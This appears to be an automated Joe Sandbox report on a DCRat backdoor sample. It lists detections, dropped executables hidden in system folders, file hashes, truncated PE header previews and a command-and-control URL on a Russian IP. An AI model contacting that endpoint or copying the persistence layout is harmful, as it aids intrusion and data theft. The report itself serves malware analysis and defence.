                                KyC6hVwU8Z.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\Desktop\dFZxqctW.log100%AviraTR/AVI.Agent.updqb
                                C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe100%AviraHEUR/AGEN.1309961
                                C:\Users\user\Desktop\luKnOVOf.log100%AviraTR/AVI.Agent.updqb
                                C:\Users\user\Desktop\oUNDhiUw.log100%AviraTR/PSW.Agent.qngqt
                                C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat100%AviraBAT/Delbat.C
                                C:\Users\user\Desktop\yTUtFuTG.log100%AviraTR/PSW.Agent.qngqt
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%AviraHEUR/AGEN.1309961
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\oUNDhiUw.log100%Joe Sandbox ML
                                C:\Users\user\Desktop\yTUtFuTG.log100%Joe Sandbox ML
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe100%Joe Sandbox ML
                                C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe0%ReversingLabs
                                C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Users\user\Desktop\dFZxqctW.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\luKnOVOf.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\oUNDhiUw.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Users\user\Desktop\yTUtFuTG.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                C:\Windows\Resources\Ease of Access Themes\PfjsOcNiQfAmiszo.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php11%VirustotalBrowse
                                http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php100%Avira URL Cloudmalware
                                http://185.43.5.930%Avira URL Cloudsafe
                                http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phptxye0%Avira URL Cloudsafe
                                http://185.43.5.93/5/4Datalife/asynccpu3Generator/0%Avira URL Cloudsafe
                                http://185.43.5.935%VirustotalBrowse
                                No contacted domains info
                                NameMaliciousAntivirus DetectionReputation
                                http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phptrue
                                • 11%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                  high
                                  https://duckduckgo.com/chrome_newtabPfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                    high
                                    https://duckduckgo.com/ac/?q=PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoPfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                        high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                          high
                                          http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phptxyePfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000024F2000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://185.43.5.93/5/4Datalife/asynccpu3Generator/PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                            high
                                            http://185.43.5.93PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000250C000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000257B000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmptrue
                                            • 5%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://upx.sf.netAmcache.hve.9.drfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                                high
                                                https://www.ecosia.org/newtab/PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepPTyCqA3ru.exe, 0000000C.00000002.2818393278.0000000002933000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      185.43.5.93
                                                      unknownRussian Federation
                                                      29182THEFIRST-ASRUtrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1572160
                                                      Start date and time:2024-12-10 07:30:53 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 42s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:19
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:KyC6hVwU8Z.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:a8c535490feb18fdff588d94c0d8a889.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@21/281@0/1
                                                      EGA Information:
                                                      • Successful, ratio: 83.3%
                                                      HCA Information:
                                                      • Successful, ratio: 66%
                                                      • Number of executed functions: 25
                                                      • Number of non-executed functions: 73
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 52.149.20.212, 20.190.177.23
                                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target KyC6hVwU8Z.exe, PID 652 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                      TimeTypeDescription
                                                      01:33:13API Interceptor281x Sleep call for process: PfjsOcNiQfAmiszo.exe modified
                                                      01:33:29API Interceptor1x Sleep call for process: WerFault.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      185.43.5.932VaAObAYLP.exeGet hashmaliciousDCRatBrowse
                                                      • 185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      THEFIRST-ASRUgorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 185.246.67.73
                                                      home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 37.230.119.182
                                                      x86-20241130-2047.elfGet hashmaliciousMiraiBrowse
                                                      • 82.146.62.180
                                                      sora.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 62.109.30.187
                                                      UNFOT5F1qt.exeGet hashmaliciousDCRatBrowse
                                                      • 188.120.228.203
                                                      RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                      • 188.120.239.221
                                                      https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==Get hashmaliciousUnknownBrowse
                                                      • 78.24.219.84
                                                      https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29tGet hashmaliciousUnknownBrowse
                                                      • 78.24.219.84
                                                      https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29tGet hashmaliciousUnknownBrowse
                                                      • 78.24.219.84
                                                      exe009.exeGet hashmaliciousEmotetBrowse
                                                      • 37.46.129.215
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe2VaAObAYLP.exeGet hashmaliciousDCRatBrowse
                                                        C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exe2VaAObAYLP.exeGet hashmaliciousDCRatBrowse
                                                          C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exe2VaAObAYLP.exeGet hashmaliciousDCRatBrowse
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):691200
                                                            Entropy (8bit):5.5554988350478975
                                                            Encrypted:false
                                                            SSDEEP:12288:C9X1yJ7/pZY7fiCI/YBfULiXPrQfkXmm1RhdLB9XFy+nM6D+:CVc7EaCQYBfcE1ZM6D+
                                                            MD5:314420BAC969BCFB9510A0E8CC3686D6
                                                            SHA1:66F1D0A60A2727970476A105C88883F37270E30F
                                                            SHA-256:38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                                            SHA-512:DEBF908ADD95AA0849451AEF830E5E71724247D352DCB5DAD6B02DCA0D54E4E915A9430DE80D970A4E7EF3749EB2FC7C6FA7839348D84F546D5934D713E7569C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                            Joe Sandbox View:
                                                            • Filename: 2VaAObAYLP.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. ..............................R.....@.....................................S.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...d...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:ASCII text, with very long lines (898), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):898
                                                            Entropy (8bit):5.89558148919014
                                                            Encrypted:false
                                                            SSDEEP:12:d1TVW9gepUxldKoMkW+8pdsKEOPr8vomCRwpANBpnOni3CTqRAQAVM1DEtNhgZO4:d1BMboldId5ZPr66wyIifmM1DEtuVz
                                                            MD5:93B7C40EBEF3E4F55326540748184925
                                                            SHA1:05D6E5EAD669095F400827489DCC68D2C6FF7F34
                                                            SHA-256:1A00B80AECA3C23C631375C14056B388698F662295721FB5834DE76F436EAD31
                                                            SHA-512:E6E230C33F6EF48DE1748F362C894110118E7866512FEC87D0A8865A9FCD234CD9B4D959CBF1BA97BFC842D9C6E06C26E016851C2B42E0287A7BD701A3266E98
                                                            Malicious:false
                                                            Preview:wl4cSaEXjchY5GwvuiqwzWcI2gh1gbXfPq5Ejlxb9OYj1eSUZ9lzxHEZJvkv2N0HFBIPKsMIuPxk82QXONch0hsHlg5xBBjwXQe0VCJqwcEhUdaQeNhouTRhTAnoxYHtqANsYaBLEvuXdKxIFoTxe4BE96gUYe3YUV1TQs1DMWk9i3EJNfiIFUPv9Isb4qwj1WCHSe1XxPlHUBgG2WH25uSAGFTI9ZJgjAHL061toLV0tHb7mmjhi3oHECBMKtXXFEiU4UP5fYOuZbR9oWgX0l7pWAHy5oj5y8uoiHDRWnCKp4rmuBhxN9heH284MbA1yT5brnahTOBMiwAcSfD3GvryaQgqJIE4nLVV8Q5HlAe88U5U1gmrYGuDlHAaHuYKKGjXbpeBk6SGQtzGULyngXggaSu0QeA1mUy1uh3MCkHbyox1R4G55vnxkD6I4nvG6ad558VwRll6PFswe2iVXE61qBRrlvRYyBeXK16TiTnTJrheUJoCEZs2emO3qoLgUMHOkUmn5PxDamr9ewWbGOTZSm3imDm3IH97kS4AhBHzmob14PZ3StZF2r67bDA2m35TnuYL2W3FHexoLBnXnslYr3E2W6idAPMstIOK0OB50T8X4RwaamO3Sgltpgz5xZE2SE4DwcgZrpiX5q7EJIDYASaNgefUZFIaPGFzXtn7FzMm7Oy8iuvoWq1AorgR7MAmhIIylHraeFSKGyPRphvoTdEiOFLqMVA2zkFzF9WaDVKQXq30bPlZbVSDDjkg6ANIFaVgsaLqKUl7TyKiLVO7tkbeRBvgZ0eCIBL7VXHBD5PGuUuPYCUlwPYe81OropQUzizSmNMyNN4yVUt6RgHXf3Q2mr9dIaXXp5QMebmLzgXjVkIoHRZHi2y6S7q5Ot
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):691200
                                                            Entropy (8bit):5.5554988350478975
                                                            Encrypted:false
                                                            SSDEEP:12288:C9X1yJ7/pZY7fiCI/YBfULiXPrQfkXmm1RhdLB9XFy+nM6D+:CVc7EaCQYBfcE1ZM6D+
                                                            MD5:314420BAC969BCFB9510A0E8CC3686D6
                                                            SHA1:66F1D0A60A2727970476A105C88883F37270E30F
                                                            SHA-256:38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
                                                            SHA-512:DEBF908ADD95AA0849451AEF830E5E71724247D352DCB5DAD6B02DCA0D54E4E915A9430DE80D970A4E7EF3749EB2FC7C6FA7839348D84F546D5934D713E7569C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                            Joe Sandbox View:
                                                            • Filename: 2VaAObAYLP.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. ..............................R.....@.....................................S.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...d...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
                                                            File Type:ASCII text, with very long lines (978), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):978
                                                            Entropy (8bit):5.89978370135191
                                                            Encrypted:false
                                                            SSDEEP:24:wMKV1qKepmyT/cHJ24PC5wbAXmOrMJtZWuo7Rbs4YETzI:MDqKepP/cpnKebyhCo4
